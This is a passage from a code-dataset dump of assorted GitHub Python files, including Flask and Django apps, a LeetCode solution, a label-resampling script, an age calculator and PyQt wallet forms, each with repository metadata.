db.execute(\"SELECT * FROM birthdays\")\r\n # Render template with database entries\r\n return render_template(\"index.html\", birthdays=birthdays)\r\n\r\n\r\n@app.route(\"/delete\", methods=[\"GET\", \"POST\"])\r\ndef delete():\r\n if request.method == \"POST\":\r\n id = request.form.get(\"id\")\r\n db.execute(\"DELETE FROM birthdays WHERE id = ?\", id)\r\n return redirect(\"/\")\r\n return redirect(\"/\")\r\n\r\n\r\n@app.route(\"/edit\", methods=[\"GET\", \"POST\"])\r\ndef edit():\r\n if request.method == \"POST\":\r\n id = request.form.get(\"id\")\r\n entry = db.execute(\"SELECT * FROM birthdays WHERE id = ?\", id)\r\n return render_template(\"edit.html\", entry=entry[0])\r\n\r\n return redirect(\"/\")\r\n\r\n@app.route(\"/editconfirm\", methods=[\"GET\", \"POST\"])\r\ndef editconfirm():\r\n if request.method == \"POST\":\r\n id = request.form.get(\"id\")\r\n name = request.form.get(\"name\")\r\n month = request.form.get(\"month\")\r\n day = request.form.get(\"day\")\r\n\r\n try:\r\n month_int = int(month)\r\n day_int = int(day)\r\n except ValueError:\r\n return redirect(\"/edit\")\r\n\r\n # Checks for wrong forms\r\n if not name or month_int > month_length or not month or day_int > day_length or not day:\r\n return redirect(\"/edit\")\r\n\r\n db.execute(\"UPDATE birthdays SET name = ?, month = ?, day = ? 
WHERE id = ?\", name, month, day, id,)\r\n return redirect(\"/\")\r\n\r\n return redirect(\"/\")\r\n\r\n", "repo_name": "YOLOCHAN1991/CS50-PSETs", "sub_path": "Week 9/birthdays/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3086, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "cs50.SQL", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 36, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 36, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 82, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 84, "usage_type": "attribute"}, {"api_name": 
"flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 85, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "37282220288", "text": "#\n# @lc app=leetcode id=1340 lang=python3\n#\n# [1340] Jump Game V\n#\n# https://leetcode.com/problems/jump-game-v/description/\n#\n# algorithms\n# Hard (58.24%)\n# Likes: 263\n# Dislikes: 13\n# Total Accepted: 9.8K\n# Total Submissions: 16.8K\n# Testcase Example: '[6,4,14,6,8,13,9,7,10,6,12]\\n2'\n#\n# Given an array of integers arr and an integer d. In one step you can jump\n# from index i to index:\n# \n# \n# i + x where: i + x < arr.length and 0 < x <= d.\n# i - x where: i - x >= 0 and 0 < x <= d.\n# \n# \n# In addition, you can only jump from index i to index j if arr[i] > arr[j] and\n# arr[i] > arr[k] for all indices k between i and j (More formally min(i, j) <\n# k < max(i, j)).\n# \n# You can choose any index of the array and start jumping. Return the maximum\n# number of indices you can visit.\n# \n# Notice that you can not jump outside of the array at any time.\n# \n# \n# Example 1:\n# \n# \n# Input: arr = [6,4,14,6,8,13,9,7,10,6,12], d = 2\n# Output: 4\n# Explanation: You can start at index 10. You can jump 10 --> 8 --> 6 --> 7 as\n# shown.\n# Note that if you start at index 6 you can only jump to index 7. You cannot\n# jump to index 5 because 13 > 9. You cannot jump to index 4 because index 5 is\n# between index 4 and 6 and 13 > 9.\n# Similarly You cannot jump from index 3 to index 2 or index 1.\n# \n# \n# Example 2:\n# \n# \n# Input: arr = [3,3,3,3,3], d = 3\n# Output: 1\n# Explanation: You can start at any index. You always cannot jump to any\n# index.\n# \n# \n# Example 3:\n# \n# \n# Input: arr = [7,6,5,4,3,2,1], d = 1\n# Output: 7\n# Explanation: Start at index 0. You can visit all the indicies. \n# \n# \n# Example 4:\n# \n# \n# Input: arr = [7,1,7,1,7,1], d = 2\n# Output: 2\n# \n# \n# Example 5:\n# \n# \n# Input: arr = [66], d = 1\n# Output: 1\n# \n# \n# \n# Constraints:\n# \n# \n# 1 <= arr.length <= 1000\n# 1 <= arr[i] <= 10^5\n# 1 <= d <= arr.length\n# \n#\n\n# @lc code=start\nfrom functools import lru_cache\nfrom collections import defaultdict\n\nclass Solution:\n def maxJumps(self, arr: List[int], d: int) -> int:\n # Time complexity: O(n x d)\n # Space complexity: O(n)\n # def dp(i):\n # if res[i]: \n # return res[i]\n # res[i] = 1\n # for di in (-1, 1):\n # for j in range(i + di, i + d * di + di, di):\n # if not (0 <= j < n and arr[j] < arr[i]):\n # break\n # res[i] = max(res[i], dp(j) + 1)\n # return res[i]\n\n # n = len(arr)\n # res = [0] * n\n # return max(map(dp, range(n)))\n\n\n # We can only jump lower, and one step needs the result from its lower step. 
\n # So we sort A[i] do the dp starting from the smallest.\n # For each A[i], we check the lower step on the left and right.\n # This process is O(D) on both side.\n # Time complexity: O(n x log(n) + n x d)\n # Space complexity: O(n)\n n = len(arr)\n dp = [1] * n\n for a, i in sorted([a, i] for i, a in enumerate(arr)):\n for di in (-1, 1):\n for j in range(i + di, i + d * di + di, di):\n if not (0 <= j < n and arr[j] < arr[i]):\n break\n dp[i] = max(dp[i], dp[j] + 1)\n return max(dp)\n\n\n # O(n)\n\n # n = len(arr)\n # dp = [1] * (n + 1)\n # stack = []\n # for i, a in enumerate(arr + [float(\"inf\")]):\n # while stack and arr[stack[-1]] < a:\n # L = [stack.pop()]\n # while stack and arr[stack[-1]] == arr[L[0]]:\n # L.append(stack.pop())\n\n # for j in L:\n # if i - j <= d:\n # dp[i] = max(dp[i], dp[j] + 1)\n # if stack and j - stack[-1] <= d:\n # dp[stack[-1]] = max(dp[stack[-1]], dp[j] + 1)\n\n # stack.append(i)\n\n # return max(dp[:-1])\n\n\n\n def jump(iterator):\n stack = []\n for i in iterator:\n while stack and arr[stack[-1]] < arr[i]:\n j = stack.pop()\n if abs(i - j) <= d:\n graph[j].append(i)\n stack.append(i)\n\n n = len(arr)\n graph = defaultdict(list)\n\n jump(range(n))\n jump(reversed(range(n)))\n\n @lru_cache(None)\n def height(i):\n return 1 + max(map(height, graph[i]), default=0)\n\n return max(map(height, range(n)))\n \n# @lc code=end\n\n", "repo_name": "chenxu0602/LeetCode", "sub_path": "1340.jump-game-v.py", "file_name": "1340.jump-game-v.py", "file_ext": "py", "file_size_in_byte": 4482, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.defaultdict", "line_number": 162, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 167, "usage_type": "call"}]} +{"seq_id": "6018362503", "text": "from unittest.mock import patch\n\nfrom django.test import override_settings\n\nfrom app.test import TestCase, mixer\nfrom todolists import tasks\n\n\n@override_settings(\n ENABLE_NOTIFICATIONS=True,\n EMAIL_ENABLED=True,\n CELERY_ALWAYS_EAGER=True,\n)\nclass TestSendingEmailAboutInvitationAndExcludingFromTodolist(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.caller = mixer.blend('auth.User')\n cls.callee = mixer.blend('auth.User')\n cls.todolist = mixer.blend('todolists.TodoList')\n\n @patch('accounts.models.Profile.send_email_about_invitation_to_todolist')\n def test_sending_invitation(self, send_invite):\n tasks.send_email_about_invitation_to_todolist(self.caller.id, self.callee.id, self.todolist.id)\n\n assert send_invite.call_count == 1\n assert send_invite.call_args[0] == (self.caller, self.todolist)\n\n @patch('accounts.models.Profile.send_email_about_excluding_from_todolist')\n def test_sending_excludation(self, send_exclude):\n tasks.send_email_about_excludation_from_todolist(self.caller.id, self.callee.id, self.todolist.id)\n\n assert send_exclude.call_count == 1\n assert send_exclude.call_args[0] == (self.caller, self.todolist)\n", "repo_name": "temirlanKabylbekov/todoapp", "sub_path": "src/todolists/tests/unit/tests_tasks.py", "file_name": "tests_tasks.py", "file_ext": "py", "file_size_in_byte": 1228, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "app.test.TestCase", "line_number": 14, "usage_type": "name"}, {"api_name": "app.test.mixer.blend", "line_number": 18, "usage_type": "call"}, {"api_name": "app.test.mixer", "line_number": 18, "usage_type": "name"}, 
{"api_name": "app.test.mixer.blend", "line_number": 19, "usage_type": "call"}, {"api_name": "app.test.mixer", "line_number": 19, "usage_type": "name"}, {"api_name": "app.test.mixer.blend", "line_number": 20, "usage_type": "call"}, {"api_name": "app.test.mixer", "line_number": 20, "usage_type": "name"}, {"api_name": "todolists.tasks.send_email_about_invitation_to_todolist", "line_number": 24, "usage_type": "call"}, {"api_name": "todolists.tasks", "line_number": 24, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 22, "usage_type": "call"}, {"api_name": "todolists.tasks.send_email_about_excludation_from_todolist", "line_number": 31, "usage_type": "call"}, {"api_name": "todolists.tasks", "line_number": 31, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 29, "usage_type": "call"}, {"api_name": "django.test.override_settings", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "936379617", "text": "import re\nimport copy\n\nfrom bson.objectid import ObjectId\nfrom flask import request, json, jsonify, render_template\nfrom flask import Flask\n\n\nimport pymongo\nfrom pymongo.errors import *\n\nfrom models import *\n\napp=Flask(__name__, static_url_path='')\n\n\n@app.errorhandler(DuplicateKeyError)\ndef duperror(error):\n print(error.details)\n return error.details['errmsg'].split('classes.$')[1], 409\n\n@app.errorhandler(MyValidationError)\ndef valerror(error):\n print(error.message)\n return jsonify(error.to_dict()), 406\n\n\n@app.route('/')\ndef about():\n return render_template('about.html')\n\n@app.route('/classes/', methods=['GET', 'PUT', 'DELETE'])\ndef get_class(class_code):\n if request.method == 'GET':\n cl = classes.find_one({'code':class_code})\n cl = {i:j for i, j in cl.items() if i!=\"_id\"}\n return jsonify(cl)\n elif request.method == 'PUT':\n class_data = request.get_json(force=True)\n print(class_data)\n if 'code' in class_data.keys():\n raise MyValidationError(\"code couldn't be changed\")\n classes.update_one({'code':class_code}, {'$set':class_data})\n return 'Updated', 202\n elif request.method =='DELETE':\n classes.delete_one({'code':class_code})\n return 'Deleted', 202\n\n@app.route('/classes', methods=['GET', 'POST'])\ndef post_class():\n if request.method == 'POST':\n class_data = request.get_json(force=True)\n is_valid = class_validator(class_data)\n if is_valid:\n class_id = classes.insert_one(class_data).inserted_id\n return 'Created', 201\n if request.method == 'GET':\n if request.args:\n if 'student' in request.args.keys():\n n_args = dict(request.args)\n n_args['students'] = n_args['student']\n n_args.pop('student')\n n_args = {i:j[0] for i, j in n_args.items()}\n else:\n n_args = request.args\n print(n_args)\n result = classes.find(n_args)\n else: result = classes.find()\n res=[]\n for r in result:\n r['_id'] = str(r['_id'])\n res.append(r)\n return jsonify(res)\n", "repo_name": "batulin-s/test", "sub_path": "school.py", "file_name": "school.py", "file_ext": "py", "file_size_in_byte": 2193, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.jsonify", 
"line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 45, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.args.keys", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "32786183884", "text": "\"\"\"\r\nTODO\r\n1、原始的类别分布\r\n2、将每一张图片的标签重新组合,组成多种label,称为resplit. 
Compute the class distribution\r\n3. Resample the images after resplit and compute the class distribution\r\n\r\n\"\"\"\r\nimport random\r\nimport numpy as np\r\nimport mmcv\r\n\r\n\r\n# metadata keys : 'gt_labels', 'class_freq', 'neg_class_freq',\r\n# 'condition_prob', 'img_ids', 'cls_data_list', 'class_split'\r\n\r\nmetadata = mmcv.load(\"/home/pengpeng/MLC/appendix/coco/longtail2017/metadata.pkl\")\r\n\r\nsplits = mmcv.load(\"../longtail2017/class_freq.pkl\")\r\n\r\nexit()\r\n\r\n\r\ndef dataSplits(groups=None, save_path=\"/home/pengpeng/ASL/appendix/coco/IncLearning/groups_id.pkl\"):\r\n    metadata = mmcv.load(\"/home/pengpeng/MLC/appendix/coco/longtail2017/metadata.pkl\")\r\n    img_ids = metadata[\"img_ids\"]\r\n    gt_labels = np.array(metadata[\"gt_labels\"])\r\n\r\n    num_classes = gt_labels.shape[1]\r\n    num_groups = len(groups)\r\n\r\n    ids = [[] for i in range(num_groups)]\r\n    for i, group in enumerate(groups):\r\n        mask = np.zeros(num_classes)\r\n        mask[group] = 1\r\n        temp_labels = gt_labels * mask\r\n        temp_sum = np.sum(temp_labels, axis=1)\r\n        for j in range(temp_sum.shape[0]):\r\n            if temp_sum[j] > 0:\r\n                ids[i].append(img_ids[j])\r\n\r\n    mmcv.dump(ids, file=save_path)\r\n\r\n\r\n\r\nmetadata = mmcv.load(\"/home/pengpeng/MLC/appendix/coco/longtail2017/metadata.pkl\")\r\ngroups = metadata[\"class_split\"]\r\n\r\ndataSplits(groups)\r\n\r\ngroup_ids = mmcv.load(\"/home/pengpeng/ASL/appendix/coco/IncLearning/groups_id.pkl\")\r\n\r\nfor group_id in group_ids:\r\n    print(len(group_id))\r\nexit()\r\n\r\npkl_data = mmcv.load(\"../appendix/coco/longtail2017/class_freq.pkl\")\r\n\r\nimg_ids = np.load(\"../appendix/coco/longtail2017/img_ids.npy\")\r\n\r\nsplits = mmcv.load(\"../appendix/coco/longtail2017/class_split.pkl\")\r\n\r\nprint(splits)\r\nexit()\r\nhead = list(splits[\"head\"])\r\nmiddle = list(splits[\"middle\"])\r\ntail = list(splits[\"tail\"])\r\n\r\ngt_labels = np.array(pkl_data[\"gt_labels\"])\r\n# number of samples in the original data\r\nprint(gt_labels.shape[0])\r\n\r\nmetadata = mmcv.load(\"../appendix/coco/longtail2017/metadata.pkl\")\r\nimg_ids = []\r\nfor i in range(80):\r\n    img_id = []\r\n    for j in range(gt_labels.shape[0]):\r\n        if gt_labels[j, i] == 1:\r\n            img_id.append(j)\r\n    img_ids.append(img_id)\r\nmetadata[\"cls_data_list\"] = img_ids\r\n\r\nmmcv.dump(metadata, \"../appendix/coco/longtail2017/metadata.pkl\")\r\n\r\nexit()\r\n\r\nclass_freq = pkl_data[\"class_freq\"]\r\nprint(class_freq)\r\n\r\n# sort class indices by sample count, ascending\r\n# ret_indexes = np.array(class_freq).argsort()\r\n# print(ret_indexes)\r\n\r\n# recombine the labels of every image into multiple labels\r\n# not every image can be split, because\r\n\r\nnew_labels = []\r\nmax_sum = 0\r\nfor i in range(gt_labels.shape[0]):\r\n    if np.sum(gt_labels[i, head]) != 0 and np.sum(gt_labels[i, tail]) != 0:\r\n        for j in head:\r\n            if gt_labels[i, j] == 1:\r\n                new_gt = np.copy(gt_labels[i])\r\n                new_gt[head] = 0\r\n                new_gt[j] = 1\r\n                new_labels.append(new_gt)\r\n    else:\r\n        new_labels.append(gt_labels[i])\r\n\r\ndata = {}\r\nnew_labels = np.array(new_labels)\r\ndata[\"gt_labels\"] = new_labels\r\n\r\n# count the number of samples of each class in the new labels\r\nnew_class_freq = new_labels.sum(axis=0)\r\n# print(new_class_freq)\r\ndata[\"class_freq\"] = new_class_freq\r\nprint(new_labels.shape[0])\r\n\r\n# select the corresponding new labels for each class\r\nimg_ids = []\r\nfor i in range(80):\r\n    img_id = []\r\n    for j in range(new_labels.shape[0]):\r\n        if new_labels[j, i] == 1:\r\n            img_id.append(j)\r\n    img_ids.append(img_id)\r\n\r\ndata[\"img_ids\"] = img_ids\r\n\r\nmmcv.dump(data, \"./seperate_tailAndHead.pkl\")\r\n\r\nrandom.seed(299)\r\nIMGNUM = 200\r\n\r\nresult = np.zeros([80])\r\n\r\nfor i in range(80):\r\n    img_id = img_ids[i]\r\n    length = len(img_id)\r\n    
# print(\"length\",len(img_id))\r\n for j in range(IMGNUM):\r\n sel = random.randint(0, length - 1)\r\n result += new_labels[img_id[sel]]\r\n\r\nprint(result)\r\n", "repo_name": "ckvic3/MLC", "sub_path": "utils/resample.py", "file_name": "resample.py", "file_ext": "py", "file_size_in_byte": 3959, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mmcv.load", "line_number": 16, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 18, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 36, "usage_type": "call"}, {"api_name": "mmcv.dump", "line_number": 41, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 45, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 50, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 58, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 72, "usage_type": "call"}, {"api_name": "mmcv.dump", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "mmcv.dump", "line_number": 130, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 135, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "34595615155", "text": "import datetime\n\n# def date_age(old_date):\n# '''\n# Calculates the age of an input date (string) by splitting the date into a list, using the datatime module\n# for the current date and finding the difference between the two.\n \n# INPUTS\n# old_date (str) = Date whose age is to be found.\n\n# OUTPUTS\n# age (int) = Age of the input date.\n# '''\n\n# old_date_list = (old_date.split('-'))\n# # print(old_date_list)\n# old_day = int(old_date_list[0])\n# old_month = int(old_date_list[1])\n# old_year = int(old_date_list[2])\n# # print(old_day)\n# current_time = datetime.datetime.now()\n# age = current_time.year - old_year - ((current_time.month, current_time.day) < (old_month, old_day))\n# return age\n\nold_date = input('Please enter a date in the format dd-mm-yyyy: ')\nold_date_list = (old_date.split('-'))\nold_day = int(old_date_list[0])\nold_month = int(old_date_list[1])\nold_year = int(old_date_list[2])\n# print(old_day)\ncurrent_time = datetime.datetime.now()\nage = current_time.year - old_year - ((current_time.month, current_time.day) < (old_month, old_day))\nprint(age)\n\n", "repo_name": "dawiddawidowski/sigma-prework", "sub_path": "age.py", "file_name": "age.py", "file_ext": "py", "file_size_in_byte": 1133, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}]} +{"seq_id": "32400171654", "text": "from msilib.schema import 
Error\nfrom PyQt5.QtWidgets import (QWidget, QDialog,QHBoxLayout,QPushButton,QTableWidgetItem,\n QTableWidget,QVBoxLayout,QApplication,QLabel)\nfrom PyQt5.QtCore import pyqtSignal,QSize\nfrom tools import FormControl,FormGroup,ComboBoxControl\nfrom dataBase import Sql_DB\nfrom messageBox import messageBoxDialog\nfrom period import getperiodNamesById\nfrom functools import partial\nimport mysql.connector as mc\n\nclass WalletChargeForm(QDialog):\n createNewOne=pyqtSignal(bool)\n def __init__(self,customer_id):\n super(WalletChargeForm,self).__init__()\n # setting window title\n self.setWindowTitle(\"Charging Wallet\")\n # setting geometry to the window\n self.setGeometry(700, 150, 400, 400)\n self.formGroupBox = FormGroup()\n self.formGroupBox.groupValidation.connect(self.formValidation)\n content=getTotal(customer_id)\n self.chargePrice=FormControl('charge Price')\n self.chargePrice.required=True\n self.chargePrice.number=True\n self.formGroupBox.addControl(self.chargePrice)\n self.customer_id=customer_id\n\n self.buttonBox = QHBoxLayout()\n self.saveButton=QPushButton('save')\n self.saveButton.setDisabled(True)\n self.cancleButton=QPushButton('cancle')\n self.buttonBox.addWidget(self.saveButton)\n self.buttonBox.addWidget(self.cancleButton)\n self.content_lable=QLabel(F\"The wallet has {content} Tooman\")\n # creating a vertical layout\n mainLayout = QVBoxLayout()\n # adding form group box to the layout\n mainLayout.addWidget(self.content_lable)\n mainLayout.addWidget(self.formGroupBox)\n # adding button box to the layout\n mainLayout.addLayout(self.buttonBox)\n # setting lay out\n self.setLayout(mainLayout)\n self.saveButton.clicked.connect(self.accept)\n self.cancleButton.clicked.connect(self.reject)\n\n def formValidation(self, is_valid):\n if is_valid:\n self.saveButton.setEnabled(True)\n else:\n self.saveButton.setDisabled(True)\n def accept(self):\n self.saveCharging()\n self.close()\n def saveCharging(self):\n try:\n mydb =Sql_DB()\n myConnection=mydb.db_connect()\n mycursor = myConnection.cursor()\n charge_price=self.chargePrice.form_control.text()\n sql = \"\"\"INSERT INTO wallet (type,customerId,amount) \n VALUES (%s,%s,%s)\"\"\"\n val = (True,self.customer_id,charge_price)\n mycursor.execute(sql, val)\n myConnection.commit()\n messageBoxDialog.show_info_messagebox(\"the wallet has been charged successfully\")\n self.createNewOne.emit(True)\n except mc.Error as e:\n print(e) \nclass WalletListForInvestor(QWidget) :\n update_tabel=pyqtSignal(bool)\n def __init__(self,investor_id):\n super().__init__()\n self.setMinimumSize(QSize(400, 700))\n self.setWindowTitle(\"Content of This Wallet\")\n self.superLayout=QVBoxLayout(self)\n charge_wal_btn=QPushButton(\"Charge this wallet\")\n charge_wal_btn.clicked.connect(partial(self.chargeWallet,investor_id))\n trns_wal_btn=QPushButton(\"Transfer the content of wallet\")\n trns_wal_btn.clicked.connect(partial(self.transferWalletContent,investor_id))\n self.button_layout=QHBoxLayout()\n self.button_layout.addWidget(charge_wal_btn)\n self.button_layout.addWidget(trns_wal_btn)\n self.wallet_table=self.walletTable(investor_id)\n self.superLayout.addLayout(self.button_layout)\n self.superLayout.addWidget(self.wallet_table)\n def chargeWallet(self,inv_id):\n form=WalletChargeForm(inv_id)\n form.createNewOne.connect(partial(self.updateTable,inv_id))\n form.exec_()\n def transferWalletContent(self,inv_id):\n form=WalletTransitionForm(inv_id)\n form.createNewOne.connect(partial(self.updateTable,inv_id))\n form.exec_()\n def 
updateTable(self,investor_id):\n data=self.getWallets(investor_id) \n table=self.wallet_table\n table.setColumnCount(4)\n table.setRowCount(len(data))\n table.setMinimumWidth(1000)\n table.setMinimumHeight(500)\n table.setHorizontalHeaderLabels([\"Date\",\"Amount\",\"Type\",\"content\"])\n content=0\n for n,rec in enumerate(data):\n date_item=QTableWidgetItem(str(rec[0]))\n amount_item=QTableWidgetItem(str(rec[1]))\n type=\"charged\" if rec[2] else \"Dischared\"\n type_item=QTableWidgetItem(type)\n content=content+rec[1] if rec[2] else content-rec[1] \n content_item=QTableWidgetItem(str(content))\n table.setItem(n,0,date_item)\n table.setItem(n,1,amount_item)\n table.setItem(n,2,type_item)\n table.setItem(n,3,content_item)\n table.resizeColumnsToContents()\n table.resizeRowsToContents() \n def walletTable(self,investor_id):\n data=self.getWallets(investor_id) \n table=QTableWidget()\n table.setColumnCount(4)\n table.setRowCount(len(data))\n table.setMinimumWidth(1000)\n table.setMinimumHeight(500)\n table.setHorizontalHeaderLabels([\"Date\",\"Amount\",\"Type\",\"content\"])\n content=0\n for n,rec in enumerate(data):\n date_item=QTableWidgetItem(str(rec[0]))\n amount_item=QTableWidgetItem(str(rec[1]))\n type=\"charged\" if rec[2] else \"Dischared\"\n type_item=QTableWidgetItem(type)\n content=content+rec[1] if rec[2] else content-rec[1] \n content_item=QTableWidgetItem(str(content))\n table.setItem(n,0,date_item)\n table.setItem(n,1,amount_item)\n table.setItem(n,2,type_item)\n table.setItem(n,3,content_item)\n table.resizeColumnsToContents()\n table.resizeRowsToContents() \n return table\n def getWallets(self,inv_id):\n try:\n connection=Sql_DB().db_connect()\n my_cursor=connection.cursor()\n wallet_query=F\"\"\"SELECT createDate,\n amount,type\n FROM wallet\n WHERE customerId='{inv_id}'\n \"\"\"\n my_cursor.execute(wallet_query)\n wallet_content=my_cursor.fetchall()\n return wallet_content\n except mc.Error as e:\n messageBoxDialog.show_critical_messagebox(F\"{e}\") \nclass WalletTransitionForm(QDialog):\n createNewOne=pyqtSignal(bool)\n def __init__(self,customer_id):\n super(WalletTransitionForm,self).__init__()\n # setting window title\n self.setWindowTitle(\"Wallet Content Transition\")\n # setting geometry to the window\n self.setGeometry(700, 150, 400, 400)\n self.formGroupBox = FormGroup()\n self.formGroupBox.groupValidation.connect(self.formValidation)\n self.customer_id=customer_id\n content=getTotal(customer_id)\n self.transition_amount=FormControl('Transition Amount')\n self.transition_amount.required=True\n self.transition_amount.number=True\n self.transition_amount.range(0,content)\n\n self.periodNameDict,temp=getperiodNamesById()\n self.target_period=ComboBoxControl(self,list(self.periodNameDict.keys()),\"Target Period\")\n self.target_period.required=True\n\n self.formGroupBox.addControl(self.transition_amount)\n self.buttonBox = QHBoxLayout()\n self.saveButton=QPushButton('save')\n self.saveButton.setDisabled(True)\n self.cancleButton=QPushButton('cancle')\n self.buttonBox.addWidget(self.saveButton)\n self.buttonBox.addWidget(self.cancleButton)\n self.content_lable=QLabel(F\"The wallet has {content} Tooman\")\n # creating a vertical layout\n mainLayout = 